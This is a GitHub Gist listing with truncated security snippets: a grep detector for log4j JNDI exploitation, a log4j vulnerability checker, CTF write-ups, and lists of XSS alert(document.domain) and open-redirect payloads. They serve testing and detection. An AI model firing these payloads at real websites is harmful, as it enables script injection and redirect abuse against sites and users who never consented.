Skip to content

Instantly share code, notes, and snippets.

View log4j-keywords
${ctx:loginId}
${map:type}
${filename}
${date:MM-dd-yyyy}
${docker:containerId}
${docker:containerName}
${docker:imageName}
${env:USER}
${event:Marker}
${mdc:UserId}
@Neo23x0
Neo23x0 / log4j_rce_detection.md
Last active Jan 19, 2022
Log4j RCE CVE-2021-44228 Exploitation Detection
View log4j_rce_detection.md

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
@byt3bl33d3r
byt3bl33d3r / log4j_rce_check.py
Created Dec 10, 2021
Python script to detect if an HTTP server is potentially vulnerable to the log4j 0day RCE (https://www.lunasec.io/docs/blog/log4j-zero-day/)
View log4j_rce_check.py
#! /usr/bin/env python3
'''
Needs Requests (pip3 install requests)
Author: Marcello Salvati, Twitter: @byt3bl33d3r
License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License)
This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021.
View burplist.py
import xml.etree.ElementTree as ET
import urllib
import base64
import math
import sys
import re
# usage: Open Burp, navigate to proxy history, ctrl-a to select all records, right click and "Save Items" as an .xml file.
# python burplist.py burprequests.xml
# output is saved to wordlist.txt
@BlackFan
BlackFan / Bootstrap_XSS.md
Last active Dec 22, 2021
Bootstrap XSS Collection
View Bootstrap_XSS.md

CVE-2019-8331

Bootstrap < 3.4.1 || < 4.3.1

✔️ CSP strict-dynamic bypass

Requires user interaction

Requires $('[data-toggle="tooltip"]').tooltip();

@stypr
stypr / a-z.md
Last active Oct 10, 2020
Harekaze CTF 2019 WEB Writeup (Yokosuka Hackers)
View a-z.md

A-z

Simple JS Jail challenge.

It is run on context, so we have nothing but to play with constructor and console.

1337 === eval(our_input)
@tomnomnom
tomnomnom / alert.js
Last active Jan 8, 2022
Ways to alert(document.domain)
View alert.js
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
View open_redirect_wordlist.txt
/http://example.com
/%5cexample.com
/%2f%2fexample.com
/example.com/%2f%2e%2e
/http:/example.com
/?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com
/redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com
View 4chan
104.16.119.221 boards.4chan.org
104.16.59.249 i.4cdn.org
@rkmylo
rkmylo / rfile_solution.py
Created May 22, 2017
RCTF 2017 - rFile Solution
View rfile_solution.py
from __future__ import division
import hashlib
import requests
from datetime import datetime, timedelta
api_url = 'http://rfile.2017.teamrois.cn/api/download/{}/{}'
def totimestamp(dt, epoch=datetime(1970,1,1)):
td = dt - epoch
return (td.microseconds + (td.seconds + td.days * 86400) * 10**6) / 10**6